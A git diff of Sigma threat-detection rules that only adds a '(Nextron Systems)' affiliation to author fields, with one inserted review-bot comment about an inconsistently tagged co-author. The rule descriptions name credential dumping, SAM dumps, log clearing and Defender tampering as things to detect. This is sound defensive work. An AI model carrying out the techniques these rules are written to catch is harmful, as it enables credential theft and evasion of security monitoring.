+++ b/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation
 references:
 - https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/11/09
 tags:
 - attack.privilege_escalation
diff --git a/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml b/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml
index 3ad2ff0ad..0d1c6c7c8 100644
--- a/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml
+++ b/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode
 references:
 - https://github.com/antonioCoco/JuicyPotatoNG
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/10/07
 modified: 2022/12/04
 tags:
diff --git a/rules/windows/builtin/system/win_system_mal_creddumper.yml b/rules/windows/builtin/system/win_system_mal_creddumper.yml
index 6c946fc93..f30c790c3 100644
--- a/rules/windows/builtin/system/win_system_mal_creddumper.yml
+++ b/rules/windows/builtin/system/win_system_mal_creddumper.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects well-known credential dumping tools execution via service execution events
 references:
 - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
+author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
 date: 2017/03/05
 modified: 2022/11/29
 tags:
diff --git a/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml b/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml
index 3c93afdd6..de52eb1c4 100644
--- a/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml
+++ b/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml
@@ -6,7 +6,7 @@ references:
 - https://twitter.com/jonasLyk/status/1347900440000811010
 - https://twitter.com/wdormann/status/1347958161609809921
 - https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/01/11
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml b/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml
index b2cc5aace..2f6594cdc 100644
--- a/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml
+++ b/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml
@@ -2,7 +2,7 @@ title: QuarksPwDump Clearing Access History
 id: 39f919f3-980b-4e6f-a975-8af7e507ef2b
 status: test
 description: Detects QuarksPwDump clearing access history in hive
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/05/15
 modified: 2022/04/14
 tags:
diff --git a/rules/windows/builtin/system/win_system_rare_service_installs.yml b/rules/windows/builtin/system/win_system_rare_service_installs.yml
index 07176047a..de32f9275 100644
--- a/rules/windows/builtin/system/win_system_rare_service_installs.yml
+++ b/rules/windows/builtin/system/win_system_rare_service_installs.yml
@@ -2,7 +2,7 @@ title: Rare Service Installations
 id: 66bfef30-22a5-4fcd-ad44-8d81e60922ae
 status: test
 description: Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/08
 modified: 2022/03/21
 tags:
diff --git a/rules/windows/builtin/system/win_system_service_install_anydesk.yml b/rules/windows/builtin/system/win_system_service_install_anydesk.yml
index a76bf431b..5277b7f19 100644
--- a/rules/windows/builtin/system/win_system_service_install_anydesk.yml
+++ b/rules/windows/builtin/system/win_system_service_install_anydesk.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.
 references:
 - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/11
 tags:
 - attack.persistence
diff --git a/rules/windows/builtin/system/win_system_service_install_hacktools.yml b/rules/windows/builtin/system/win_system_service_install_hacktools.yml
index 6f0f4e94b..4e9779c3d 100644
--- a/rules/windows/builtin/system/win_system_service_install_hacktools.yml
+++ b/rules/windows/builtin/system/win_system_service_install_hacktools.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects PsExec service installation and execution events (service and Sysmon)
 references:
 - Internal Research
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/21
 tags:
 - attack.execution
diff --git a/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml b/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml
index 2d51a1dad..d1b487cef 100644
--- a/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml
+++ b/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers
 references:
 - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/11/28
 tags:
 - attack.command_and_control
diff --git a/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml b/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml
index 7687f648d..47e9046ac 100644
--- a/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml
+++ b/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects NetSupport Manager service installation on the target system.
 references:
 - http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/31
 tags:
 - attack.persistence
diff --git a/rules/windows/builtin/system/win_system_service_install_paexec.yml b/rules/windows/builtin/system/win_system_service_install_paexec.yml
index 6f779a865..0c9a73ba5 100644
--- a/rules/windows/builtin/system/win_system_service_install_paexec.yml
+++ b/rules/windows/builtin/system/win_system_service_install_paexec.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects PAExec service installation
 references:
 - https://www.poweradmin.com/paexec/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/26
 tags:
 - attack.execution
diff --git a/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml b/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml
index 4956ebdb7..288ba91a6 100644
--- a/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml
+++ b/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml
@@ -6,7 +6,7 @@ description: |
 PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines
 references:
 - https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/22
 tags:
 - attack.privilege_escalation
diff --git a/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml b/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml
index 89a1c1d23..18edd9bff 100644
--- a/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml
+++ b/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml
@@ -6,7 +6,7 @@ description: |
 When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name "PDQDeployRunner-X" where "X" is an integer starting from 1
 references:
 - https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/22
 tags:
 - attack.privilege_escalation
diff --git a/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml b/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml
index d380957e8..2bc6ee185 100644
--- a/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml
+++ b/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects Remote Utilities Host service installation on the target system.
 references:
 - https://www.remoteutilities.com/support/kb/host-service-won-t-start/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/31
 tags:
 - attack.persistence
diff --git a/rules/windows/builtin/system/win_system_service_install_sliver.yml b/rules/windows/builtin/system/win_system_service_install_sliver.yml
index d20c81137..c4c54a6f3 100644
--- a/rules/windows/builtin/system/win_system_service_install_sliver.yml
+++ b/rules/windows/builtin/system/win_system_service_install_sliver.yml
@@ -5,7 +5,7 @@ description: Detects known malicious service installation that appear in cases i
 references:
 - https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231
 - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
-author: Florian Roth, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
 date: 2022/08/25
 tags:
 - attack.execution
diff --git a/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml b/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml
index 415e92d20..186b04455 100644
--- a/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml
+++ b/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects a service installation that uses a suspicious double ampersand used in the image path value
 references:
 - Internal Research
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/07/05
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml b/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml
index ea4a33722..ba939b237 100644
--- a/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml
+++ b/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml
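Review bot: The affiliation tag is applied inconsistently in the win_system_service_install_sliver.yml hunk: `+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali` tags only the first author, while every other hunk in this commit that names Nasreddine Bencherchali rewrites him as `Nasreddine Bencherchali (Nextron Systems)`. If the tag is meant to mark every Nextron-affiliated author, the line should read `author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)`. Other multi-author lines in the commit could be checked the same way, since a search-and-replace on the first author alone would miss co-authors listed later in the field.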
@@ -4,7 +4,7 @@ status: experimental
 description: Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.
 references:
 - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/11/28
 tags:
 - attack.command_and_control
diff --git a/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml b/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml
index 03564d4f5..5039dfcb3 100644
--- a/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml
+++ b/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml
@@ -8,7 +8,7 @@ description: Detects the clearing of one of the Windows Core Eventlogs. e.g. cau
 references:
 - https://twitter.com/deviouspolack/status/832535435960209408
 - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
-author: Florian Roth, Tim Shelton
+author: Florian Roth (Nextron Systems), Tim Shelton
 date: 2022/05/17
 modified: 2023/01/18
 tags:
diff --git a/rules/windows/builtin/system/win_system_susp_proceshacker.yml b/rules/windows/builtin/system/win_system_susp_proceshacker.yml
index 4b9d987c6..9abe07d80 100644
--- a/rules/windows/builtin/system/win_system_susp_proceshacker.yml
+++ b/rules/windows/builtin/system/win_system_susp_proceshacker.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a ProcessHacker tool that elevated privileges to a very high level
 references:
 - https://twitter.com/1kwpeter/status/1397816101455765504
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/05/27
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml b/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml
index 82202a50d..c2c464722 100644
--- a/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml
+++ b/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse
 references:
 - https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/30
 tags:
 - attack.persistence
diff --git a/rules/windows/builtin/system/win_system_susp_sam_dump.yml b/rules/windows/builtin/system/win_system_susp_sam_dump.yml
index 0457bd61c..76d470125 100644
--- a/rules/windows/builtin/system/win_system_susp_sam_dump.yml
+++ b/rules/windows/builtin/system/win_system_susp_sam_dump.yml
@@ -2,7 +2,7 @@ title: SAM Dump to AppData
 id: 839dd1e8-eda8-4834-8145-01beeee33acd
 status: test
 description: Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/01/27
 modified: 2022/04/14
 tags:
diff --git a/rules/windows/builtin/system/win_system_susp_service_installation.yml b/rules/windows/builtin/system/win_system_susp_service_installation.yml
index 350de7e69..4a51ca660 100644
--- a/rules/windows/builtin/system/win_system_susp_service_installation.yml
+++ b/rules/windows/builtin/system/win_system_susp_service_installation.yml
@@ -2,7 +2,7 @@ title: Suspicious Service Installation
 id: 1d61f71d-59d2-479e-9562-4ff5f4ead16b
 status: experimental
 description: Detects suspicious service installation commands
-author: pH-T
+author: pH-T (Nextron Systems)
 date: 2022/03/18
 modified: 2022/11/14
 tags:
diff --git a/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml b/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml
index ce7cafec7..249ee47fe 100644
--- a/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml
+++ b/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml
@@ -2,7 +2,7 @@ title: Service Installation in Suspicious Folder
 id: 5e993621-67d4-488a-b9ae-b420d08b96cb
 status: experimental
 description: Detects service installation in suspicious folder appdata
-author: pH-T
+author: pH-T (Nextron Systems)
 date: 2022/03/18
 modified: 2022/10/12
 tags:
diff --git a/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml b/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml
index 595b0eeeb..afa79606d 100644
--- a/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml
+++ b/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml
@@ -2,7 +2,7 @@ title: Service Installation with Suspicious Folder Pattern
 id: 1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2
 status: test
 description: Detects service installation with suspicious folder patterns
-author: pH-T
+author: pH-T (Nextron Systems)
 date: 2022/03/18
 modified: 2022/03/24
 tags:
diff --git a/rules/windows/builtin/system/win_system_susp_service_installation_script.yml b/rules/windows/builtin/system/win_system_susp_service_installation_script.yml
index cd226771f..7879372ae 100644
--- a/rules/windows/builtin/system/win_system_susp_service_installation_script.yml
+++ b/rules/windows/builtin/system/win_system_susp_service_installation_script.yml
@@ -2,7 +2,7 @@ title: Suspicious Service Installation Script
 id: 70f00d10-60b2-4f34-b9a0-dc3df3fe762a
 status: experimental
 description: Detects suspicious service installation scripts
-author: pH-T
+author: pH-T (Nextron Systems)
 date: 2022/03/18
 modified: 2022/11/18
 tags:
diff --git a/rules/windows/builtin/taskscheduler/win_taskscheduler_rare_schtask_creation.yml b/rules/windows/builtin/taskscheduler/win_taskscheduler_rare_schtask_creation.yml
index c614618fc..614950c83 100644
--- a/rules/windows/builtin/taskscheduler/win_taskscheduler_rare_schtask_creation.yml
+++ b/rules/windows/builtin/taskscheduler/win_taskscheduler_rare_schtask_creation.yml
@@ -2,7 +2,7 @@ title: Rare Scheduled Task Creations
 id: b20f6158-9438-41be-83da-a5a16ac90c2b
 status: test
 description: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/17
 modified: 2021/12/28
 tags:
diff --git a/rules/windows/builtin/taskscheduler/win_taskscheduler_susp_task_locations.yml b/rules/windows/builtin/taskscheduler/win_taskscheduler_susp_task_locations.yml
index 3a4008f9c..8e0292202 100644
--- a/rules/windows/builtin/taskscheduler/win_taskscheduler_susp_task_locations.yml
+++ b/rules/windows/builtin/taskscheduler/win_taskscheduler_susp_task_locations.yml
@@ -2,7 +2,7 @@ title: Suspicious Scheduled Tasks Locations
 id: 424273ea-7cf8-43a6-b712-375f925e481f
 status: experimental
 description: Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/05
 tags:
 - attack.persistence
diff --git a/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml b/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml
index 8748fbc4e..3db26733c 100644
--- a/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml
+++ b/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml
@@ -5,7 +5,7 @@ description: Detects cases in which ngrok, a reverse proxy tool, forwards events
 references:
 - https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg
 - https://ngrok.com/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/04/29
 tags:
 - attack.command_and_control
diff --git a/rules/windows/builtin/win_alert_mimikatz_keywords.yml b/rules/windows/builtin/win_alert_mimikatz_keywords.yml
index e9da431ba..5a985b573 100644
--- a/rules/windows/builtin/win_alert_mimikatz_keywords.yml
+++ b/rules/windows/builtin/win_alert_mimikatz_keywords.yml
@@ -4,7 +4,7 @@ status: test
 description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)
 references:
 - https://tools.thehacker.recipes/mimikatz/modules
-author: Florian Roth (rule), David ANDRE (additional keywords)
+author: Florian Roth (Nextron Systems), David ANDRE (additional keywords)
 date: 2017/01/10
 modified: 2022/01/05
 tags:
diff --git a/rules/windows/builtin/windefend/win_defender_exclusions.yml b/rules/windows/builtin/windefend/win_defender_exclusions.yml
index 9ecb61821..01079979e 100644
--- a/rules/windows/builtin/windefend/win_defender_exclusions.yml
+++ b/rules/windows/builtin/windefend/win_defender_exclusions.yml
@@ -4,7 +4,7 @@ status: stable
 description: Detects the Setting of Windows Defender Exclusions
 references:
 - https://twitter.com/_nullbind/status/1204923340810543109
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/07/06
 modified: 2022/12/06
 tags:
diff --git a/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml b/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml
index 692e62478..ad13c4915 100644
--- a/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml
+++ b/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects when someone is adding or removing applications or folder from exploit guard "ProtectedFolders" and "AllowedApplications"
 references:
 - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/05
 modified: 2022/12/06
 tags:
diff --git a/rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml b/rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml
index 81aea09c4..428412495 100644
--- a/rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml
+++ b/rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the restoration of files from the defender quarantine
 references:
 - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/06
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml b/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml
index 1aa0edf42..dc4ec9c8e 100644
--- a/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml
+++ b/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml
@@ -10,7 +10,7 @@ description: Detects suspicious changes to the windows defender configuration
 references:
     - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide
     - https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/06
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/builtin/wmi/win_wmi_persistence.yml b/rules/windows/builtin/wmi/win_wmi_persistence.yml
index 1658f997e..70ab63098 100644
--- a/rules/windows/builtin/wmi/win_wmi_persistence.yml
+++ b/rules/windows/builtin/wmi/win_wmi_persistence.yml
@@ -5,7 +5,7 @@ description: Detects suspicious WMI event filter and command line event consumer
 references:
     - https://twitter.com/mattifestation/status/899646620148539397
     - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
-author: Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community
+author: Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community
 date: 2017/08/22
 modified: 2022/02/10
 tags:
diff --git a/rules/windows/create_remote_thread/create_remote_thread_win_bumblebee.yml b/rules/windows/create_remote_thread/create_remote_thread_win_bumblebee.yml
index 63d3deebd..a4a32a992 100644
--- a/rules/windows/create_remote_thread/create_remote_thread_win_bumblebee.yml
+++ b/rules/windows/create_remote_thread/create_remote_thread_win_bumblebee.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects remote thread injection events based on action seen used by bumblebee
 references:
     - https://thedfirreport.com/2022/09/26/bumblebee-round-two/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/27
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml b/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml
index 63e9abc70..2759aebda 100644
--- a/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml
+++ b/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml
@@ -5,7 +5,7 @@ description: Detects a possible remote threat creation with certain characterist
 references:
     - https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f
     - https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/
-author: Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community
+author: Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community
 date: 2018/11/30
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml b/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml
index e74f78bcc..270ebf9df 100644
--- a/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml
+++ b/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects PowerShell remote thread creation in Rundll32.exe
 references:
     - https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/06/25
 modified: 2022/07/14
 tags:
diff --git a/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_target.yml b/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_target.yml
index d94edda2d..e2078d1fb 100644
--- a/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_target.yml
+++ b/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_target.yml
@@ -7,7 +7,7 @@ description: |
     It is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.
 references:
     - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/08/25
 modified: 2022/08/29
 logsource:
diff --git a/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml b/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml
index 197553068..b5f21ce85 100644
--- a/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml
+++ b/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects a remote thread creation in suspicious target images
 references:
     - https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/16
 modified: 2022/09/29
 tags:
diff --git a/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml b/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml
index db4b02263..4148840e1 100644
--- a/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml
+++ b/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the creation of an ADS data stream that contains an executable (non-empty imphash)
 references:
     - https://twitter.com/0xrawsec/status/1002478725605273600?s=21
-author: Florian Roth, @0xrawsec
+author: Florian Roth (Nextron Systems), @0xrawsec
 date: 2018/06/03
 modified: 2022/12/30
 tags:
diff --git a/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml b/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml
index e756ff433..ef49d1f52 100644
--- a/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml
+++ b/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the creation of a file on disk that has an imphash of a well-known hack tool
 references:
     - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/08/24
 modified: 2022/12/30
 tags:
diff --git a/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml b/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml
index 0ed232b58..bb0e9d37a 100644
--- a/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml
+++ b/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml
@@ -5,7 +5,7 @@ description: Detects the download of suspicious file type from a well-known file
 references:
     - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015
     - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/08/24
 modified: 2023/01/19
 tags:
diff --git a/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml b/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml
index 894c9c4c8..275c5143a 100644
--- a/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml
+++ b/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml
@@ -5,7 +5,7 @@ description: Detects the download of suspicious file type from a well-known file
 references:
     - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015
     - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/08/24
 modified: 2023/01/19
 tags:
diff --git a/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml b/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml
index c8d2af60c..697fabe2c 100644
--- a/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml
+++ b/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the download of suspicious file type from URLs with IP
 references:
     - https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md
-author: Nasreddine Bencherchali, Florian Roth
+author: Nasreddine Bencherchali (Nextron Systems), Florian Roth
 date: 2022/09/07
 modified: 2022/12/05
 tags:
diff --git a/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml b/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml
index 23d3b71dd..e170875b2 100644
